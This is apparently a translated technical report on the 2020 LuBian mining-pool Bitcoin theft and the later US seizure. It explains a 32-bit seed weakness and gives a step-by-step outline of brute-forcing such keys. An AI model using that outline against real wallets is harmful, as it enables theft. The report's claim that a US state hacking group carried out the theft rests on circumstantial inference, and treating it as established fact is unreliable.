Author: National Computer Virus Emergency Response Center
On December 29, 2020, LuBian mining pool suffered a major hacking attack, with a total of 127,272.06953176 Bitcoins (worth approximately $3.5 billion at the time, now worth $15 billion) stolen by the attackers. The holder of this huge amount of Bitcoins was Chen Zhi, chairman of the Prince Group of Cambodia.
Following the hacking incident, Chen Zhi and his Prince Group posted messages on the blockchain multiple times in early 2021 and July 2022, appealing to the hackers to return the stolen Bitcoins and offering to pay a ransom, but received no response.
Strangely, after this huge sum of Bitcoin was stolen, it remained dormant in a Bitcoin wallet address controlled by the attackers for four years, almost untouched. This clearly doesn't conform to the typical behavior of hackers eager to cash out and pursue profits; it seems more like a precise operation orchestrated by a "nation-state hacking organization." It wasn't until June 2024 that the stolen Bitcoin was transferred to a new Bitcoin wallet address, where it has remained untouched ever since.
On October 14, 2025, the U.S. Department of Justice announced criminal charges against Chen Zhi and the seizure of 127,000 Bitcoins from Chen Zhi and his Prince Group. Evidence suggests that the massive amount of Bitcoins seized by the U.S. government from Chen Zhi and his Prince Group were actually Bitcoins from the LuBian mining pool that had already been stolen by hackers using technical means back in 2020. In other words, the U.S. government may have already stolen 127,000 Bitcoins held by Chen Zhi through hacking techniques as early as 2020; this is a classic case of a "double-cross" operation orchestrated by a state-sponsored hacking group.
This report takes a technical perspective, tracing the technical origins of the incident to provide an in-depth analysis of the key technical details. It focuses on the ins and outs of the theft of these Bitcoins, reconstructing the complete attack timeline, and assessing Bitcoin's security mechanisms, hoping to provide valuable security insights for the cryptocurrency industry and users.
I. Background of the Event
LuBian mining pool, established in early 2020, was a rapidly rising Bitcoin mining pool with primary operations in China and Iran. In December 2020, LuBian suffered a massive hack, resulting in the theft of over 90% of its Bitcoin holdings. The total amount stolen was 127,272.06953176 BTC, which largely matches the 127,271 BTC claimed in the US Department of Justice indictment.
LuBian mining pools operate on a model involving the centralized storage and distribution of mining rewards. The Bitcoin in the pool addresses is not stored on regulated centralized exchanges, but rather resides in non-custodial wallets. From a technical perspective, non-custodial wallets (also known as cold wallets or hardware wallets) are considered the ultimate safe haven for crypto assets. Unlike exchange accounts that can be frozen by a single decree, they are more like a private vault belonging solely to the holder, with the key (private key) held only by the holder.
As a cryptocurrency, Bitcoin's on-chain addresses are used to identify the ownership and flow of Bitcoin assets. Controlling the private key of an on-chain address grants complete control over the Bitcoin held within that address. According to reports from on-chain analytics firms, the massive amount of Bitcoin held by Chen Zhi, controlled by the US government, highly overlaps with the LuBian mining pool hack.
On-chain data records show that on December 29, 2020 (Beijing time), LuBian's core Bitcoin wallet address underwent an abnormal transfer, with a total transfer amount of 127,272.06953176 BTC, which is basically consistent with the 127,271 BTC mentioned in the US Department of Justice indictment. This batch of stolen Bitcoin remained dormant until June 2024 after the abnormal transfer.
Between June 22 and July 23, 2024 (Beijing time), the stolen Bitcoins were transferred to a new on-chain address and have remained untouched since. ARKHAM, a well-known US blockchain tracking platform, has identified these final addresses as being held by the US government. Currently, the US government has not disclosed in its indictment how it obtained the private keys to Chen Zhi's massive Bitcoin on-chain address.
Figure 1: Timeline of Key Activities
II. Attack Link Analysis
As is well known, random numbers are the cornerstone of cryptographic security in the world of blockchain. Bitcoin uses asymmetric encryption technology; the Bitcoin private key is a 256-bit binary random number, theoretically capable of being cracked in 2256 attempts, which is nearly impossible. However, if this 256-bit binary private key is not completely randomly generated—for example, if 224 bits follow a predictable pattern, leaving only 32 bits randomly generated—its private key strength is greatly reduced, and it can be brute-forced in just 2^32 (approximately 4.29 billion) attempts. For instance, in September 2022, the UK cryptocurrency market maker Wintermute suffered a $160 million theft due to a similar pseudo-random number vulnerability.
In August 2023, the international security research team MilkSad first announced the discovery of a pseudo-random number generator (PRNG) vulnerability in a third-party key generation tool and successfully applied for a CVE number (CVE-2023-39910). In their research report, the team mentioned that the LuBian Bitcoin mining pool had a similar vulnerability, and among the LuBian Bitcoin mining pool addresses that had been compromised, they disclosed included all 25 Bitcoin addresses mentioned in the US Department of Justice indictment.
Figure 2: List of 25 Bitcoin wallet addresses in the U.S. Department of Justice indictment
As a non-custodial Bitcoin wallet system, LuBian Bitcoin wallet addresses rely on a custom private key generation algorithm to manage funds. Instead of using the recommended 256-bit binary random number standard, this algorithm uses a 32-bit binary random number, which has a fatal flaw: it relies solely on a "pseudo-random number generator" (Mersenne Twister, MT19937-32) that uses a timestamp or weak input as a seed. A pseudo-random number generator (PRNG) is equivalent to the randomness of a 4-byte integer, which can be efficiently exhaustively searched in modern computing. Mathematically, the probability of cracking it is 1/2^32. For example, assuming an attack script tests 106 keys per second, the cracking time would be approximately 4200 seconds (about 1.17 hours). In practice, optimization tools such as Hashcat or custom scripts can further accelerate this process. Attackers exploited this vulnerability to steal a large amount of Bitcoin from the LuBian Bitcoin mining pool.
Figure 3: Comparison Table of LuBian Mining Pool's Defects Compared with Industry Safety Standards
Through technical tracing, the complete timeline and related details of the LuBian mining pool hack are as follows:
1. Attack and Theft Phase: December 29, 2020 (Beijing Time)
Incident: Hackers exploited a vulnerability in the private key generation of Bitcoin wallet addresses on the LuBian mining pool to brute-force over 5,000 weakly randomized wallet addresses (wallet type: P2WPKH-nested-in-P2SH, prefix 3). Within approximately two hours, about 127,272.06953176 BTC (worth approximately $3.5 billion at the time) was drained from these wallet addresses, leaving less than 200 BTC. All suspicious transactions shared the same transaction fees, indicating the attack was executed by an automated bulk transfer script.
Sender: LuBian mining pool weak random Bitcoin wallet address group (controlled by the LuBian mining farm operating entity, belonging to Chen Zhi's Prince Group);
Recipient: A group of Bitcoin wallet addresses controlled by the attacker (undisclosed addresses);
Transfer path: Weak wallet address group → Attacker's wallet address group;
Correlation analysis: The total amount stolen was 127,272.06953176 BTC, which is basically consistent with the 127,271 BTC mentioned in the US Department of Justice indictment.
2. Dormant Phase: December 30, 2020 to June 22, 2024 (Beijing Time)
Event: This batch of Bitcoins was stolen in 2020 through a pseudo-random number vulnerability and remained dormant in a Bitcoin wallet address controlled by the attacker for as long as four years. Less than one ten-thousandth of the dust transactions may have been used for testing.
Correlation analysis: This batch of Bitcoins remained almost untouched until it was fully taken over by the US government on June 22, 2024. This is clearly inconsistent with the nature of ordinary hackers who are eager to cash out and pursue profits. It is more like a precise operation orchestrated by a state-owned hacking organization.
3. Resumption Trial Phase: Early 2021, July 4th and 26th, 2022 (Beijing Time)
Event: After the Bitcoins were stolen, during its dormant period, in early 2021, the LuBian mining pool sent over 1,500 messages (costing approximately 1.4 BTC in fees) via the Bitcoin OP_RETURN function, embedding them in the blockchain data area, pleading with the hackers to return the funds. Example message: "Please return our funds, we'll pay a reward." On July 4th and 26th, 2022, the LuBian mining pool again sent messages via the Bitcoin OP_RETURN function, example message: "MSG from LB. To the whitehat who is saving our asset, you can contact us through 1228btc@gmail.com to discuss the return of asset and your reward."
Sender: Lubian weakly random Bitcoin wallet address (controlled by the Lubian mining farm operating entity, belonging to Chen Zhi's Prince Group);
Recipient: A group of Bitcoin wallet addresses controlled by the attacker;
Transfer path: weak wallet address group → attacker wallet address group; small transactions embed OP_RETURN).
Correlation analysis: After the theft, these messages were confirmed to be multiple attempts by LuBian mining pool, as the sender, to contact a "third-party hacker" to request the return of assets and discuss ransom matters.
4. Activation and Transfer Phase: June 22 to July 23, 2024 (Beijing Time)
Incident: Bitcoins from a group of dormant Bitcoin wallet addresses controlled by attackers were activated and transferred to a final Bitcoin wallet address. This final wallet address was identified as being held by the US government by ARKHAM, a well-known US blockchain tracking platform.
Sender: A group of Bitcoin wallet addresses controlled by the attacker;
Recipient: Newly integrated final wallet address group (not publicly disclosed, but confirmed to be a wallet address group controlled by the US government)
Transfer path: Bitcoin wallet address group controlled by attackers → wallet address group controlled by the US government;
Correlation analysis: This batch of stolen Bitcoins remained largely untouched for four years before finally being taken over by the US government.
5. Notice of Seizure: October 14, 2025 (US local time)
Event: The U.S. Department of Justice issued a statement announcing charges against Chen Zhi and "confiscating" 127,000 bitcoins in his possession.
Meanwhile, through the blockchain's public mechanism, all Bitcoin transaction records are publicly traceable. Based on this, this report traces the source of the massive amount of Bitcoin stolen from the LuBian weakly random Bitcoin wallet address (controlled by the LuBian mining operation entity, possibly belonging to Chen Zhi's Prince Group). The total number of stolen Bitcoins is 127,272.06953176, originating from: approximately 17,800 Bitcoins from independent "mining," approximately 2,300 Bitcoins from mining pool wages, and 107,100 Bitcoins from exchanges and other channels. Preliminary results suggest a discrepancy with the US Department of Justice indictment's claim that all Bitcoins originated from illicit income.
III. Detailed Analysis of Vulnerability Technologies
1. Generating a Bitcoin wallet address private key:
The core vulnerability in the LuBian mining pool lies in its private key generator, which uses a flaw similar to the "MilkSad" defect in Libbitcoin Explorer. Specifically, the system employs the Mersenne Twister (MT19937-32) pseudo-random number generator, initialized with only a 32-bit seed, resulting in an effective entropy of only 32 bits. This PRNG is non-cryptographic, easily predictable, and easily reverse-engineered. An attacker can generate a corresponding private key by enumerating all possible 32-bit seeds (0 to 2^32-1) and checking if it matches the public key hash of a known wallet address.
In the Bitcoin ecosystem, the private key generation process is typically: random seed → SHA-256 hash → ECDSA private key.
The LuBian mining pool's underlying library may be based on custom code or open-source libraries (such as Libbitcoin), but it neglects entropy security. Similar to the MilkSad vulnerability, the Libbitcoin Explorer's "bx seed" command also uses the MT19937-32 random number generator, relying solely on timestamps or weak inputs as seeds, making the private key vulnerable to brute-force attacks. In the LuBian attack, over 5,000 wallets were affected, indicating that the vulnerability is systemic and likely stems from code reuse during bulk wallet generation.
2. Simulated attack process:
(1) Identify the target wallet address (by monitoring LuBian mining pool activity on-chain);
(2) Enumerate the 32-bit seed: for seed in 0 to 4294967295;
(3) Generate private key: private_key = SHA256(seed);
(4) Derived public key and address: Calculated using ECDSA SECP256k1 curve;
(5) Matching: If the derived address matches the target, the transaction is signed using the private key to steal funds;
Compared to similar vulnerabilities: This vulnerability is similar to the 32-bit entropy flaw in Trust Wallet, which led to the large-scale cracking of Bitcoin wallet addresses; the "MilkSad" vulnerability in Libbitcoin Explorer also exposed private keys due to low entropy. These cases all stem from legacy issues in early codebases that did not adopt the BIP-39 standard (12-24 word seed phrases, providing high entropy). LuBian mining pool may have used a custom algorithm designed to simplify management but neglected security.
Defense deficiencies: LuBian mining pool did not implement multisignature (multisig), hardware wallets, or hierarchical deterministic wallets (HD wallets), all of which could improve security. On-chain data shows that the attack covered multiple wallets, indicating a systemic vulnerability rather than a single point of failure.
3. On-chain evidence and recovery attempts:
OP_RETURN messages: LuBian mining pool sent over 1,500 messages via Bitcoin's OP_RETURN feature, costing 1.4 BTC, pleading with attackers to return funds. These messages are embedded in the blockchain, proving they represent the actions of the true owner and are not forged. Example messages include "Please return funds" or similar requests, distributed across multiple transactions.
4. Attack Correlation Analysis:
The U.S. Department of Justice, in its criminal indictment against Chen Zhi dated October 14, 2025 (case number 1:25-cr-00416), listed 25 Bitcoin wallet addresses holding approximately 127,271 BTC, worth approximately $15 billion, which have been seized. Through blockchain analysis and review of official documents, these addresses are highly correlated with the LuBian mining pool attack.
Direct Connection: Blockchain analysis reveals that 25 addresses listed in the U.S. Department of Justice indictment are the final holding addresses of the Bitcoin stolen during the 2020 LuBian mining pool attack. An Elliptic report indicates that this Bitcoin was "stolen" from LuBian's mining operations in 2020. Arkham Intelligence confirms that the funds seized by the U.S. Department of Justice are directly related to the LuBian mining pool theft.
Evidence in the indictment: Although the U.S. Department of Justice indictment does not directly name the “LuBian hack,” it mentions that the funds originated from “theft attacks on Bitcoin mining operations in Iran and China,” which is consistent with on-chain analysis by Elliptic and Arkham Intelligence.
Related to the attack: Judging from the attack methods, LuBian mining pool's huge amount of Bitcoin was stolen in a technical attack in 2020 and remained dormant for four years. During this period, less than one ten-thousandth of it was traded. Until it was fully taken over by the US government in 2024, it remained almost untouched. This is inconsistent with the nature of hackers who are eager to cash out and pursue profits. It is more like a precise operation orchestrated by a state-owned hacking organization. Analysts believe that the US government may have already taken control of this batch of Bitcoin in December 2020.
IV. Impacts and Recommendations
The LuBian mining pool was hacked in 2020, which had a far-reaching impact, leading to the pool's actual dissolution and losses equivalent to more than 90% of its total assets at the time. The stolen Bitcoin is now worth $15 billion, highlighting the risks of amplified price volatility.
The LuBian mining pool incident exposed systemic risks in random number generation within cryptocurrency toolchains. To prevent similar vulnerabilities, the blockchain industry should use cryptographically secure pseudo-random number generators (CSPRNGs); implement multi-layered defenses, including multisignature (multisig), cold storage, and regular auditing; and avoid custom private key generation algorithms. Mining pools need to integrate real-time on-chain monitoring and abnormal transfer alert systems. For ordinary users, protection should avoid using unverified key generation modules from open-source communities. This incident also reminds us that even with high blockchain transparency, weak security foundations can still lead to catastrophic consequences. It also highlights the importance of cybersecurity in the future development of the digital economy and digital currencies.
